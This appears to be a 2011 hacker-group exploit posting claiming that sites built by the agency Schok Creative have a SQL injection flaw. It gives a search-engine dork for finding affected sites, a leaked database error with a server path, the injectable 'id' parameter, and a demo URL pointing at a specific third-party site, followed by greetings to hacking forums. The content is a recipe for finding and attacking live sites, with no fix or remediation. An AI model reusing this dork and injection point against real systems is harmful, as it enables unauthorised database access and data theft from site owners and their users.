Sites created by Schok Creative suffer from a remote SQL injection vulnerability.
7dc0055c5274ec7437bf95c76e36a43b0359c3cbaf719121cde6e20ed1e6a1f9
.___ __ .__
__| _/____ ____ ____ _____/ |_| |__
/ __ |/ _ \ / \ / ___\ / _ \ __\ | \
/ /_/ ( <_> ) | \/ /_/ > <_> ) | | Y \
\____ |\____/|___| /\___ / \____/|__| |___| /
\/ \//_____/ \/#==#[A|B|H]#==#
================================================================
# Exploit Title : schokcreative SQL inj: vulnerable
# Google Dork : "Site by Schok."
# Date : 30-11-2011
# Author : nGa Sa Lu [ GaNgst3r ]
# Service Provider : http://www.schokcreative.com/
# Tested on : Vista
# Platform : php
================================================================
[+] Google Dork :
"Site by Schok."
[+] SQL Error Statement :
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/normanya/public_html/detail_inTheNews.php on line 69
[+] http://www.localhost.com/detail_inTheNews.php?id=[SQL]
[+] Demo :
http://www.normanyatooma.com/detail_inTheNews.php?id=10'
###################################################################################
x Greetz to all M1rT crew, h4ckall[dot]net, 4lbora4q[dot]com bros, hakforums.net -
###################################################################################
x-[+] i'am #######################################################################
-------------<< [ dongoth ] ^^ [ GaNgst3r ] ^^ [ nGa Sa Lu ] >>-------------------x
###################################################################################
===================================================================================